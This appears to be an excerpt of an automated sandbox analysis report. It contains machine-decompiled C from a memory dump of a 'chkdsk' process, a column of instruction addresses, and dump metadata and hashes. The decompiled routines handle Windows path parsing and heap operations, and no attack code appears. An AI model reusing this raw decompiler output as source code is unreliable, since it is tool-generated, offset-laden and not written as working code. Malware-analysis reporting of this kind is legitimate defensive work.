                                                      														 *(_t427 + 4) =  *(_t427 + 4) | 1;
                                                      														_t479 =  *(_t528 - 0x78) + ( *( *(_t528 - 0x78) + _t427) & 0x0000ffff);
                                                      														 *(_t528 - 0x78) = _t479;
                                                      														__eflags = _t505;
                                                      														if(_t505 != 0) {
                                                      															_t241 = _t505 + 4;
                                                      															 *_t241 =  *(_t505 + 4) | 1;
                                                      															__eflags =  *_t241;
                                                      														}
                                                      													}
                                                      													_t328 =  *(_t528 + 0x1c);
                                                      													__eflags = _t328;
                                                      													if(_t328 == 0) {
                                                      														L87:
                                                      														_t329 =  *((intOrPtr*)(_t528 - 0xe0));
                                                      														 *((intOrPtr*)(_t427 + 0x10)) = _t329;
                                                      														_t455 =  *(_t528 - 0xdc);
                                                      														 *(_t427 + 0x14) = _t455;
                                                      														_t480 =  *(_t528 - 0xa0);
                                                      														_t517 = 3;
                                                      														__eflags =  *((intOrPtr*)(_t480 + 0x10)) - _t517;
                                                      														if( *((intOrPtr*)(_t480 + 0x10)) != _t517) {
                                                      															asm("rdtsc");
                                                      															 *(_t427 + 0x3c) = _t480;
                                                      														} else {
                                                      															 *(_t427 + 0x3c) = _t455;
                                                      														}
                                                      														 *((intOrPtr*)(_t427 + 0x38)) = _t329;
                                                      														_t456 =  *[fs:0x18];
                                                      														 *((intOrPtr*)(_t427 + 8)) =  *((intOrPtr*)(_t456 + 0x24));
                                                      														 *((intOrPtr*)(_t427 + 0xc)) =  *((intOrPtr*)(_t456 + 0x20));
                                                      														_t427 = 0;
                                                      														__eflags = 0;
                                                      														_t511 = 0x18;
                                                      														goto L91;
                                                      													} else {
                                                      														_t519 =  *((intOrPtr*)(_t528 - 0xc8)) + 0xc;
                                                      														__eflags = _t519;
                                                      														 *(_t528 - 0x8c) = _t328;
                                                      														do {
                                                      															_t506 =  *((intOrPtr*)(_t519 - 4));
                                                      															_t457 =  *((intOrPtr*)(_t519 - 0xc));
                                                      															 *(_t528 - 0xd4) =  *(_t519 - 8);
                                                      															_t333 =  *((intOrPtr*)(_t528 - 0xb4));
                                                      															__eflags =  *(_t333 + 0x36) & 0x00004000;
                                                      															if(( *(_t333 + 0x36) & 0x00004000) != 0) {
                                                      																_t334 =  *_t519;
                                                      															} else {
                                                      																_t334 = 0;
                                                      															}
                                                      															_t336 = _t334 & 0x000000ff;
                                                      															__eflags = _t336;
                                                      															_t427 =  *(_t528 - 0x88);
                                                      															if(_t336 == 0) {
                                                      																_t481 = _t479 + _t506;
                                                      																__eflags = _t481;
                                                      																 *(_t528 - 0x78) = _t481;
                                                      																E04DCF3E0(_t479 + _t427, _t457, _t506);
                                                      																_t529 = _t529 + 0xc;
                                                      															} else {
                                                      																_t340 = _t336 - 1;
                                                      																__eflags = _t340;
                                                      																if(_t340 == 0) {
                                                      																	E04DCF3E0( *(_t528 - 0xb8), _t457, _t506);
                                                      																	_t529 = _t529 + 0xc;
                                                      																	 *(_t528 - 0xb8) =  *(_t528 - 0xb8) + _t506;
                                                      																} else {
                                                      																	__eflags = _t340 == 0;
                                                      																	if(_t340 == 0) {
                                                      																		__eflags = _t506 - 8;
                                                      																		if(_t506 == 8) {
                                                      																			 *((intOrPtr*)(_t528 - 0xe0)) =  *_t457;
                                                      																			 *(_t528 - 0xdc) =  *(_t457 + 4);
                                                      																		}
                                                      																	}
                                                      																}
                                                      															}
                                                      															_t339 = 0x10;
                                                      															_t519 = _t519 + _t339;
                                                      															_t263 = _t528 - 0x8c;
                                                      															 *_t263 =  *(_t528 - 0x8c) - 1;
                                                      															__eflags =  *_t263;
                                                      															_t479 =  *(_t528 - 0x78);
                                                      														} while ( *_t263 != 0);
                                                      														goto L87;
                                                      													}
                                                      												}
                                                      											} else {
                                                      												_t392 =  *( *((intOrPtr*)(_t528 - 0xb4)) + 0x36) & 0x00004000;
                                                      												 *(_t528 - 0xa2) = _t392;
                                                      												_t469 =  *((intOrPtr*)(_t528 - 0xc8)) + 8;
                                                      												__eflags = _t469;
                                                      												while(1) {
                                                      													 *(_t528 - 0xe4) = _t511;
                                                      													__eflags = _t392;
                                                      													_t393 = _t427;
                                                      													if(_t392 != 0) {
                                                      														_t393 =  *((intOrPtr*)(_t469 + 4));
                                                      													}
                                                      													_t395 = (_t393 & 0x000000ff) - _t427;
                                                      													__eflags = _t395;
                                                      													if(_t395 == 0) {
                                                      														_t511 = _t511 +  *_t469;
                                                      														__eflags = _t511;
                                                      													} else {
                                                      														_t398 = _t395 - 1;
                                                      														__eflags = _t398;
                                                      														if(_t398 == 0) {
                                                      															 *(_t528 - 0x90) =  *(_t528 - 0x90) +  *_t469;
                                                      															 *(_t528 - 0xb0) =  *(_t528 - 0xb0) + 1;
                                                      														} else {
                                                      															__eflags = _t398 == 1;
                                                      															if(_t398 == 1) {
                                                      																 *(_t528 - 0xa8) =  *(_t469 - 8);
                                                      																_t402 =  *_t469 & 0x0000ffff;
                                                      																 *(_t528 - 0xac) = _t402;
                                                      																_t511 = _t511 + ((_t402 & 0x0000ffff) + 0x0000000f & 0xfffffff8);
                                                      															}
                                                      														}
                                                      													}
                                                      													__eflags = _t511 -  *(_t528 - 0xe4);
                                                      													if(_t511 <  *(_t528 - 0xe4)) {
                                                      														break;
                                                      													}
                                                      													_t397 =  *(_t528 - 0x88) + 1;
                                                      													 *(_t528 - 0x88) = _t397;
                                                      													_t469 = _t469 + 0x10;
                                                      													__eflags = _t397 -  *(_t528 + 0x1c);
                                                      													_t392 =  *(_t528 - 0xa2);
                                                      													if(_t397 <  *(_t528 + 0x1c)) {
                                                      														continue;
                                                      													}
                                                      													goto L45;
                                                      												}
                                                      												_t475 = 0x216;
                                                      												 *(_t528 - 0x74) = 0x216;
                                                      												goto L45;
                                                      											}
                                                      										} else {
                                                      											asm("lock dec dword [eax+ecx*8+0x4]");
                                                      											goto L16;
                                                      										}
                                                      									}
                                                      									_t491 = E04E54CAB(_t306, _t528 - 0xa4);
                                                      									 *(_t528 - 0x74) = _t491;
                                                      									__eflags = _t491;
                                                      									if(_t491 != 0) {
                                                      										goto L91;
                                                      									} else {
                                                      										_t474 =  *((intOrPtr*)(_t528 - 0x94));
                                                      										goto L20;
                                                      									}
                                                      								}
                                                      								L16:
                                                      								 *(_t528 - 0x74) = 0x1069;
                                                      								L93:
                                                      								_t298 =  *(_t528 - 0xd0) + 1;
                                                      								 *(_t528 - 0xd0) = _t298;
                                                      								_t474 = _t474 + _t511;
                                                      								 *((intOrPtr*)(_t528 - 0x94)) = _t474;
                                                      								_t494 = 4;
                                                      								__eflags = _t298 - _t494;
                                                      								if(_t298 >= _t494) {
                                                      									goto L100;
                                                      								}
                                                      								_t494 =  *(_t528 - 0xcc);
                                                      								_t435 = _t298;
                                                      								continue;
                                                      							}
                                                      							__eflags = _t494[2] | _t494[3];
                                                      							if((_t494[2] | _t494[3]) == 0) {
                                                      								goto L15;
                                                      							}
                                                      							goto L12;
                                                      						}
                                                      						__eflags = _t301;
                                                      						if(_t301 != 0) {
                                                      							goto L92;
                                                      						}
                                                      						goto L10;
                                                      						L92:
                                                      						goto L93;
                                                      					}
                                                      				} else {
                                                      					_push(0x57);
                                                      					L101:
                                                      					return E04DDD130(_t427, _t494, _t511);
                                                      				}
                                                      			}

                                                      0x04e5602a
                                                      0x04e5602b
                                                      0x04e56031
                                                      0x04e56037
                                                      0x04e56038
                                                      0x04e5603e
                                                      0x04e56048
                                                      0x04e56049
                                                      0x04e5604a
                                                      0x04e5604b
                                                      0x04e5604c
                                                      0x04e5604d
                                                      0x04e56053
                                                      0x04e56054
                                                      0x04e56054
                                                      0x04e56062
                                                      0x04e56065
                                                      0x04e56067
                                                      0x04e5606a
                                                      0x04e56070
                                                      0x04e56075
                                                      0x04e56076
                                                      0x04e56081
                                                      0x04e56087
                                                      0x04e56095
                                                      0x04e56099
                                                      0x04e5609e
                                                      0x04e560a4
                                                      0x04e560ae
                                                      0x04e560b0
                                                      0x04e560b3
                                                      0x04e560b6
                                                      0x04e560b8
                                                      0x04e560ba
                                                      0x04e560ba
                                                      0x04e560ba
                                                      0x04e560ba
                                                      0x04e560be
                                                      0x04e560c0
                                                      0x04e560c5
                                                      0x04e560c5
                                                      0x04e560c5
                                                      0x04e560c6
                                                      0x04e560cd
                                                      0x04e56114
                                                      0x04e560cf
                                                      0x04e560cf
                                                      0x04e560d4
                                                      0x04e560d5
                                                      0x04e560da
                                                      0x04e560db
                                                      0x04e560e1
                                                      0x04e560e2
                                                      0x04e560e8
                                                      0x04e560f8
                                                      0x04e560fd
                                                      0x04e560fe
                                                      0x04e56102
                                                      0x04e56104
                                                      0x04e56107
                                                      0x04e56109
                                                      0x04e5610b
                                                      0x04e5610b
                                                      0x04e5610b
                                                      0x04e5610b
                                                      0x04e5610f
                                                      0x04e5610f
                                                      0x04e56117
                                                      0x04e5611a
                                                      0x04e5611f
                                                      0x04e56125
                                                      0x04e56134
                                                      0x04e56139
                                                      0x04e5613f
                                                      0x04e56146
                                                      0x04e56148
                                                      0x04e5614b
                                                      0x04e5614d
                                                      0x04e5614f
                                                      0x04e5614f
                                                      0x04e5614f
                                                      0x04e5614f
                                                      0x04e56153
                                                      0x04e56159
                                                      0x04e56159
                                                      0x04e5615c
                                                      0x04e56163
                                                      0x04e56169
                                                      0x04e5616c
                                                      0x04e56172
                                                      0x04e56181
                                                      0x04e56186
                                                      0x04e56187
                                                      0x04e5618b
                                                      0x04e56191
                                                      0x04e56195
                                                      0x04e561a3
                                                      0x04e561bb
                                                      0x04e561c0
                                                      0x04e561c3
                                                      0x04e561cc
                                                      0x04e561d0
                                                      0x04e561dc
                                                      0x04e561de
                                                      0x04e561e1
                                                      0x04e561e4
                                                      0x04e561e6
                                                      0x04e561e8
                                                      0x04e561e8
                                                      0x04e561e8
                                                      0x04e561e8
                                                      0x04e561e6
                                                      0x04e561ec
                                                      0x04e561f3
                                                      0x04e56203
                                                      0x04e56209
                                                      0x04e5620a
                                                      0x04e56216
                                                      0x04e5621d
                                                      0x04e56227
                                                      0x04e56241
                                                      0x04e56246
                                                      0x04e5624c
                                                      0x04e56257
                                                      0x04e56259
                                                      0x04e5625c
                                                      0x04e5625e
                                                      0x04e56260
                                                      0x04e56260
                                                      0x04e56260
                                                      0x04e56260
                                                      0x04e5625e
                                                      0x04e56264
                                                      0x04e56267
                                                      0x04e56269
                                                      0x04e56315
                                                      0x04e56315
                                                      0x04e5631b
                                                      0x04e5631e
                                                      0x04e56324
                                                      0x04e56327
                                                      0x04e5632f
                                                      0x04e56330
                                                      0x04e56333
                                                      0x04e5633a
                                                      0x04e5633c
                                                      0x04e56335
                                                      0x04e56335
                                                      0x04e56335
                                                      0x04e5633f
                                                      0x04e56342
                                                      0x04e5634c
                                                      0x04e56352
                                                      0x04e56355
                                                      0x04e56355
                                                      0x04e56359
                                                      0x00000000
                                                      0x04e5626f
                                                      0x04e56275
                                                      0x04e56275
                                                      0x04e56278
                                                      0x04e5627e
                                                      0x04e5627e
                                                      0x04e56281
                                                      0x04e56287
                                                      0x04e5628d
                                                      0x04e56298
                                                      0x04e5629c
                                                      0x04e562a2
                                                      0x04e5629e
                                                      0x04e5629e
                                                      0x04e5629e
                                                      0x04e562a7
                                                      0x04e562a7
                                                      0x04e562aa
                                                      0x04e562b0
                                                      0x04e562f0
                                                      0x04e562f0
                                                      0x04e562f2
                                                      0x04e562f8
                                                      0x04e562fd
                                                      0x04e562b2
                                                      0x04e562b2
                                                      0x04e562b2
                                                      0x04e562b5
                                                      0x04e562dd
                                                      0x04e562e2
                                                      0x04e562e5
                                                      0x04e562b7
                                                      0x04e562b8
                                                      0x04e562bb
                                                      0x04e562bd
                                                      0x04e562c0
                                                      0x04e562c4
                                                      0x04e562cd
                                                      0x04e562cd
                                                      0x04e562c0
                                                      0x04e562bb
                                                      0x04e562b5
                                                      0x04e56302
                                                      0x04e56303
                                                      0x04e56305
                                                      0x04e56305
                                                      0x04e56305
                                                      0x04e5630c
                                                      0x04e5630c
                                                      0x00000000
                                                      0x04e5627e
                                                      0x04e56269
                                                      0x04e55eac
                                                      0x04e55ebb
                                                      0x04e55ebe
                                                      0x04e55ecb
                                                      0x04e55ecb
                                                      0x04e55ece
                                                      0x04e55ece
                                                      0x04e55ed4
                                                      0x04e55ed7
                                                      0x04e55ed9
                                                      0x04e55edb
                                                      0x04e55edb
                                                      0x04e55ee1
                                                      0x04e55ee1
                                                      0x04e55ee3
                                                      0x04e55f20
                                                      0x04e55f20
                                                      0x04e55ee5
                                                      0x04e55ee5
                                                      0x04e55ee5
                                                      0x04e55ee8
                                                      0x04e55f11
                                                      0x04e55f18
                                                      0x04e55eea
                                                      0x04e55eea
                                                      0x04e55eed
                                                      0x04e55ef2
                                                      0x04e55ef8
                                                      0x04e55efb
                                                      0x04e55f0a
                                                      0x04e55f0a
                                                      0x04e55eed
                                                      0x04e55ee8
                                                      0x04e55f22
                                                      0x04e55f28
                                                      0x00000000
                                                      0x00000000
                                                      0x04e55f30
                                                      0x04e55f31
                                                      0x04e55f37
                                                      0x04e55f3a
                                                      0x04e55f3d
                                                      0x04e55f44
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x04e55f46
                                                      0x04e55f48
                                                      0x04e55f4d
                                                      0x00000000
                                                      0x04e55f4d
                                                      0x04e55dda
                                                      0x04e55ddf
                                                      0x00000000
                                                      0x04e55ddf
                                                      0x04e55dd8
                                                      0x04e55da7
                                                      0x04e55da9
                                                      0x04e55dac
                                                      0x04e55dae
                                                      0x00000000
                                                      0x04e55db4
                                                      0x04e55db4
                                                      0x00000000
                                                      0x04e55db4
                                                      0x04e55dae
                                                      0x04e55d88
                                                      0x04e55d8d
                                                      0x04e56363
                                                      0x04e56369
                                                      0x04e5636a
                                                      0x04e56370
                                                      0x04e56372
                                                      0x04e5637a
                                                      0x04e5637b
                                                      0x04e5637d
                                                      0x00000000
                                                      0x00000000
                                                      0x04e5637f
                                                      0x04e56385
                                                      0x00000000
                                                      0x04e56385
                                                      0x04e55d38
                                                      0x04e55d3b
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x04e55d3b
                                                      0x04e55d27
                                                      0x04e55d29
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x04e56360
                                                      0x00000000
                                                      0x04e56360
                                                      0x04e55c10
                                                      0x04e55c10
                                                      0x04e563da
                                                      0x04e563e5
                                                      0x04e563e5

                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.567085353.0000000004D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D60000, based on PE: true
                                                      • Associated: 0000000A.00000002.567198234.0000000004E7B000.00000040.00000800.00020000.00000000.sdmp
                                                      • Associated: 0000000A.00000002.567207274.0000000004E7F000.00000040.00000800.00020000.00000000.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_10_2_4d60000_chkdsk.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 85001d081fca8a707d1f4c241de40d37db93f10fbbed4a241b39fd512dd0d405
                                                      • Instruction ID: c5aca6ec22f722caaf175e343b4cb90b749f2573c0718d89c066fb7cd7cddf8b
                                                      • Opcode Fuzzy Hash: 85001d081fca8a707d1f4c241de40d37db93f10fbbed4a241b39fd512dd0d405
                                                      • Instruction Fuzzy Hash: BF425C75A00229DFDB24CF68C880BA9B7B1FF45318F5481EAD94DEB252E734A985CF50
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 92%
                                                      			E04DA4120(signed char __ecx, signed short* __edx, signed short* _a4, signed int _a8, signed short* _a12, signed short* _a16, signed short _a20) {
                                                      				signed int _v8;
                                                      				void* _v20;
                                                      				signed int _v24;
                                                      				char _v532;
                                                      				char _v540;
                                                      				signed short _v544;
                                                      				signed int _v548;
                                                      				signed short* _v552;
                                                      				signed short _v556;
                                                      				signed short* _v560;
                                                      				signed short* _v564;
                                                      				signed short* _v568;
                                                      				void* _v570;
                                                      				signed short* _v572;
                                                      				signed short _v576;
                                                      				signed int _v580;
                                                      				char _v581;
                                                      				void* _v584;
                                                      				unsigned int _v588;
                                                      				signed short* _v592;
                                                      				void* _v597;
                                                      				void* _v600;
                                                      				void* _v604;
                                                      				void* _v609;
                                                      				void* _v616;
                                                      				void* __ebx;
                                                      				void* __edi;
                                                      				void* __esi;
                                                      				unsigned int _t161;
                                                      				signed int _t162;
                                                      				unsigned int _t163;
                                                      				void* _t169;
                                                      				signed short _t173;
                                                      				signed short _t177;
                                                      				signed short _t181;
                                                      				unsigned int _t182;
                                                      				signed int _t185;
                                                      				signed int _t213;
                                                      				signed int _t225;
                                                      				short _t233;
                                                      				signed char _t234;
                                                      				signed int _t242;
                                                      				signed int _t243;
                                                      				signed int _t244;
                                                      				signed int _t245;
                                                      				signed int _t250;
                                                      				void* _t251;
                                                      				signed short* _t254;
                                                      				void* _t255;
                                                      				signed int _t256;
                                                      				void* _t257;
                                                      				signed short* _t260;
                                                      				signed short _t265;
                                                      				signed short* _t269;
                                                      				signed short _t271;
                                                      				signed short** _t272;
                                                      				signed short* _t275;
                                                      				signed short _t282;
                                                      				signed short _t283;
                                                      				signed short _t290;
                                                      				signed short _t299;
                                                      				signed short _t307;
                                                      				signed int _t308;
                                                      				signed short _t311;
                                                      				signed short* _t315;
                                                      				signed short _t316;
                                                      				void* _t317;
                                                      				void* _t319;
                                                      				signed short* _t321;
                                                      				void* _t322;
                                                      				void* _t323;
                                                      				unsigned int _t324;
                                                      				signed int _t325;
                                                      				void* _t326;
                                                      				signed int _t327;
                                                      				signed int _t329;
                                                      
                                                      				_t329 = (_t327 & 0xfffffff8) - 0x24c;
                                                      				_v8 =  *0x4e7d360 ^ _t329;
                                                      				_t157 = _a8;
                                                      				_t321 = _a4;
                                                      				_t315 = __edx;
                                                      				_v548 = __ecx;
                                                      				_t305 = _a20;
                                                      				_v560 = _a12;
                                                      				_t260 = _a16;
                                                      				_v564 = __edx;
                                                      				_v580 = _a8;
                                                      				_v572 = _t260;
                                                      				_v544 = _a20;
                                                      				if( *__edx <= 8) {
                                                      					L3:
                                                      					if(_t260 != 0) {
                                                      						 *_t260 = 0;
                                                      					}
                                                      					_t254 =  &_v532;
                                                      					_v588 = 0x208;
                                                      					if((_v548 & 0x00000001) != 0) {
                                                      						_v556 =  *_t315;
                                                      						_v552 = _t315[2];
                                                      						_t161 = E04DBF232( &_v556);
                                                      						_t316 = _v556;
                                                      						_v540 = _t161;
                                                      						goto L17;
                                                      					} else {
                                                      						_t306 = 0x208;
                                                      						_t298 = _t315;
                                                      						_t316 = E04DA6E30(_t315, 0x208, _t254, _t260,  &_v581,  &_v540);
                                                      						if(_t316 == 0) {
                                                      							L68:
                                                      							_t322 = 0xc0000033;
                                                      							goto L39;
                                                      						} else {
                                                      							while(_v581 == 0) {
                                                      								_t233 = _v588;
                                                      								if(_t316 > _t233) {
                                                      									_t234 = _v548;
                                                      									if((_t234 & 0x00000004) != 0 || (_t234 & 0x00000008) == 0 &&  *((char*)( *[fs:0x30] + 3)) < 0) {
                                                      										_t254 = L04DA4620(_t298,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t316);
                                                      										if(_t254 == 0) {
                                                      											_t169 = 0xc0000017;
                                                      										} else {
                                                      											_t298 = _v564;
                                                      											_v588 = _t316;
                                                      											_t306 = _t316;
                                                      											_t316 = E04DA6E30(_v564, _t316, _t254, _v572,  &_v581,  &_v540);
                                                      											if(_t316 != 0) {
                                                      												continue;
                                                      											} else {
                                                      												goto L68;
                                                      											}
                                                      										}
                                                      									} else {
                                                      										goto L90;
                                                      									}
                                                      								} else {
                                                      									_v556 = _t316;
                                                      									 *((short*)(_t329 + 0x32)) = _t233;
                                                      									_v552 = _t254;
                                                      									if(_t316 < 2) {
                                                      										L11:
                                                      										if(_t316 < 4 ||  *_t254 == 0 || _t254[1] != 0x3a) {
                                                      											_t161 = 5;
                                                      										} else {
                                                      											if(_t316 < 6) {
                                                      												L87:
                                                      												_t161 = 3;
                                                      											} else {
                                                      												_t242 = _t254[2] & 0x0000ffff;
                                                      												if(_t242 != 0x5c) {
                                                      													if(_t242 == 0x2f) {
                                                      														goto L16;
                                                      													} else {
                                                      														goto L87;
                                                      													}
                                                      													goto L101;
                                                      												} else {
                                                      													L16:
                                                      													_t161 = 2;
                                                      												}
                                                      											}
                                                      										}
                                                      									} else {
                                                      										_t243 =  *_t254 & 0x0000ffff;
                                                      										if(_t243 == 0x5c || _t243 == 0x2f) {
                                                      											if(_t316 < 4) {
                                                      												L81:
                                                      												_t161 = 4;
                                                      												goto L17;
                                                      											} else {
                                                      												_t244 = _t254[1] & 0x0000ffff;
                                                      												if(_t244 != 0x5c) {
                                                      													if(_t244 == 0x2f) {
                                                      														goto L60;
                                                      													} else {
                                                      														goto L81;
                                                      													}
                                                      												} else {
                                                      													L60:
                                                      													if(_t316 < 6) {
                                                      														L83:
                                                      														_t161 = 1;
                                                      														goto L17;
                                                      													} else {
                                                      														_t245 = _t254[2] & 0x0000ffff;
                                                      														if(_t245 != 0x2e) {
                                                      															if(_t245 == 0x3f) {
                                                      																goto L62;
                                                      															} else {
                                                      																goto L83;
                                                      															}
                                                      														} else {
                                                      															L62:
                                                      															if(_t316 < 8) {
                                                      																L85:
                                                      																_t161 = ((0 | _t316 != 0x00000006) - 0x00000001 & 0x00000006) + 1;
                                                      																goto L17;
                                                      															} else {
                                                      																_t250 = _t254[3] & 0x0000ffff;
                                                      																if(_t250 != 0x5c) {
                                                      																	if(_t250 == 0x2f) {
                                                      																		goto L64;
                                                      																	} else {
                                                      																		goto L85;
                                                      																	}
                                                      																} else {
                                                      																	L64:
                                                      																	_t161 = 6;
                                                      																	goto L17;
                                                      																}
                                                      															}
                                                      														}
                                                      													}
                                                      												}
                                                      											}
                                                      											goto L101;
                                                      										} else {
                                                      											goto L11;
                                                      										}
                                                      									}
                                                      									L17:
                                                      									if(_t161 != 2) {
                                                      										_t162 = _t161 - 1;
                                                      										if(_t162 > 5) {
                                                      											goto L18;
                                                      										} else {
                                                      											switch( *((intOrPtr*)(_t162 * 4 +  &M04DA45F8))) {
                                                      												case 0:
                                                      													_v568 = 0x4d61078;
                                                      													__eax = 2;
                                                      													goto L20;
                                                      												case 1:
                                                      													goto L18;
                                                      												case 2:
                                                      													_t163 = 4;
                                                      													goto L19;
                                                      											}
                                                      										}
                                                      										goto L41;
                                                      									} else {
                                                      										L18:
                                                      										_t163 = 0;
                                                      										L19:
                                                      										_v568 = 0x4d611c4;
                                                      									}
                                                      									L20:
                                                      									_v588 = _t163;
                                                      									_v564 = _t163 + _t163;
                                                      									_t306 =  *_v568 & 0x0000ffff;
                                                      									_t265 = _t306 - _v564 + 2 + (_t316 & 0x0000ffff);
                                                      									_v576 = _t265;
                                                      									if(_t265 > 0xfffe) {
                                                      										L90:
                                                      										_t322 = 0xc0000106;
                                                      									} else {
                                                      										if(_t321 != 0) {
                                                      											if(_t265 > (_t321[1] & 0x0000ffff)) {
                                                      												if(_v580 != 0) {
                                                      													goto L23;
                                                      												} else {
                                                      													_t322 = 0xc0000106;
                                                      													goto L39;
                                                      												}
                                                      											} else {
                                                      												_t177 = _t306;
                                                      												goto L25;
                                                      											}
                                                      											goto L101;
                                                      										} else {
                                                      											if(_v580 == _t321) {
                                                      												_t322 = 0xc000000d;
                                                      											} else {
                                                      												L23:
                                                      												_t173 = L04DA4620(_t265,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t265);
                                                      												_t269 = _v592;
                                                      												_t269[2] = _t173;
                                                      												if(_t173 == 0) {
                                                      													_t322 = 0xc0000017;
                                                      												} else {
                                                      													_t316 = _v556;
                                                      													 *_t269 = 0;
                                                      													_t321 = _t269;
                                                      													_t269[1] = _v576;
                                                      													_t177 =  *_v568 & 0x0000ffff;
                                                      													L25:
                                                      													_v580 = _t177;
                                                      													if(_t177 == 0) {
                                                      														L29:
                                                      														_t307 =  *_t321 & 0x0000ffff;
                                                      													} else {
                                                      														_t290 =  *_t321 & 0x0000ffff;
                                                      														_v576 = _t290;
                                                      														_t310 = _t177 & 0x0000ffff;
                                                      														if((_t290 & 0x0000ffff) + (_t177 & 0x0000ffff) > (_t321[1] & 0x0000ffff)) {
                                                      															_t307 =  *_t321 & 0xffff;
                                                      														} else {
                                                      															_v576 = _t321[2] + ((_v576 & 0x0000ffff) >> 1) * 2;
                                                      															E04DCF720(_t321[2] + ((_v576 & 0x0000ffff) >> 1) * 2, _v568[2], _t310);
                                                      															_t329 = _t329 + 0xc;
                                                      															_t311 = _v580;
                                                      															_t225 =  *_t321 + _t311 & 0x0000ffff;
                                                      															 *_t321 = _t225;
                                                      															if(_t225 + 1 < (_t321[1] & 0x0000ffff)) {
                                                      																 *((short*)(_v576 + ((_t311 & 0x0000ffff) >> 1) * 2)) = 0;
                                                      															}
                                                      															goto L29;
                                                      														}
                                                      													}
                                                      													_t271 = _v556 - _v588 + _v588;
                                                      													_v580 = _t307;
                                                      													_v576 = _t271;
                                                      													if(_t271 != 0) {
                                                      														_t308 = _t271 & 0x0000ffff;
                                                      														_v588 = _t308;
                                                      														if(_t308 + (_t307 & 0x0000ffff) <= (_t321[1] & 0x0000ffff)) {
                                                      															_v580 = _t321[2] + ((_v580 & 0x0000ffff) >> 1) * 2;
                                                      															E04DCF720(_t321[2] + ((_v580 & 0x0000ffff) >> 1) * 2, _v552 + _v564, _t308);
                                                      															_t329 = _t329 + 0xc;
                                                      															_t213 =  *_t321 + _v576 & 0x0000ffff;
                                                      															 *_t321 = _t213;
                                                      															if(_t213 + 1 < (_t321[1] & 0x0000ffff)) {
                                                      																 *((short*)(_v580 + (_v588 >> 1) * 2)) = 0;
                                                      															}
                                                      														}
                                                      													}
                                                      													_t272 = _v560;
                                                      													if(_t272 != 0) {
                                                      														 *_t272 = _t321;
                                                      													}
                                                      													_t306 = 0;
                                                      													 *((short*)(_t321[2] + (( *_t321 & 0x0000ffff) >> 1) * 2)) = 0;
                                                      													_t275 = _v572;
                                                      													if(_t275 != 0) {
                                                      														_t306 =  *_t275;
                                                      														if(_t306 != 0) {
                                                      															 *_t275 = ( *_v568 & 0x0000ffff) - _v564 - _t254 + _t306 + _t321[2];
                                                      														}
                                                      													}
                                                      													_t181 = _v544;
                                                      													if(_t181 != 0) {
                                                      														 *_t181 = 0;
                                                      														 *((intOrPtr*)(_t181 + 4)) = 0;
                                                      														 *((intOrPtr*)(_t181 + 8)) = 0;
                                                      														 *((intOrPtr*)(_t181 + 0xc)) = 0;
                                                      														if(_v540 == 5) {
                                                      															_t182 = E04D852A5(1);
                                                      															_v588 = _t182;
                                                      															if(_t182 == 0) {
                                                      																E04D9EB70(1, 0x4e779a0);
                                                      																goto L38;
                                                      															} else {
                                                      																_v560 = _t182 + 0xc;
                                                      																_t185 = E04D9AA20( &_v556, _t182 + 0xc,  &_v556, 1);
                                                      																if(_t185 == 0) {
                                                      																	_t324 = _v588;
                                                      																	goto L97;
                                                      																} else {
                                                      																	_t306 = _v544;
                                                      																	_t282 = ( *_v560 & 0x0000ffff) - _v564 + ( *_v568 & 0x0000ffff) + _t321[2];
                                                      																	 *(_t306 + 4) = _t282;
                                                      																	_v576 = _t282;
                                                      																	_t325 = _t316 -  *_v560 & 0x0000ffff;
                                                      																	 *_t306 = _t325;
                                                      																	if( *_t282 == 0x5c) {
                                                      																		_t149 = _t325 - 2; // -2
                                                      																		_t283 = _t149;
                                                      																		 *_t306 = _t283;
                                                      																		 *(_t306 + 4) = _v576 + 2;
                                                      																		_t185 = _t283 & 0x0000ffff;
                                                      																	}
                                                      																	_t324 = _v588;
                                                      																	 *(_t306 + 2) = _t185;
                                                      																	if((_v548 & 0x00000002) == 0) {
                                                      																		L97:
                                                      																		asm("lock xadd [esi], eax");
                                                      																		if((_t185 | 0xffffffff) == 0) {
                                                      																			_push( *((intOrPtr*)(_t324 + 4)));
                                                      																			E04DC95D0();
                                                      																			L04DA77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t324);
                                                      																		}
                                                      																	} else {
                                                      																		 *(_t306 + 0xc) = _t324;
                                                      																		 *((intOrPtr*)(_t306 + 8)) =  *((intOrPtr*)(_t324 + 4));
                                                      																	}
                                                      																	goto L38;
                                                      																}
                                                      															}
                                                      															goto L41;
                                                      														}
                                                      													}
                                                      													L38:
                                                      													_t322 = 0;
                                                      												}
                                                      											}
                                                      										}
                                                      									}
                                                      									L39:
                                                      									if(_t254 !=  &_v532) {
                                                      										L04DA77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t254);
                                                      									}
                                                      									_t169 = _t322;
                                                      								}
                                                      								goto L41;
                                                      							}
                                                      							goto L68;
                                                      						}
                                                      					}
                                                      					L41:
                                                      					_pop(_t317);
                                                      					_pop(_t323);
                                                      					_pop(_t255);
                                                      					return E04DCB640(_t169, _t255, _v8 ^ _t329, _t306, _t317, _t323);
                                                      				} else {
                                                      					_t299 = __edx[2];
                                                      					if( *_t299 == 0x5c) {
                                                      						_t256 =  *(_t299 + 2) & 0x0000ffff;
                                                      						if(_t256 != 0x5c) {
                                                      							if(_t256 != 0x3f) {
                                                      								goto L2;
                                                      							} else {
                                                      								goto L50;
                                                      							}
                                                      						} else {
                                                      							L50:
                                                      							if( *((short*)(_t299 + 4)) != 0x3f ||  *((short*)(_t299 + 6)) != 0x5c) {
                                                      								goto L2;
                                                      							} else {
                                                      								_t251 = E04DC3D43(_t315, _t321, _t157, _v560, _v572, _t305);
                                                      								_pop(_t319);
                                                      								_pop(_t326);
                                                      								_pop(_t257);
                                                      								return E04DCB640(_t251, _t257, _v24 ^ _t329, _t321, _t319, _t326);
                                                      							}
                                                      						}
                                                      					} else {
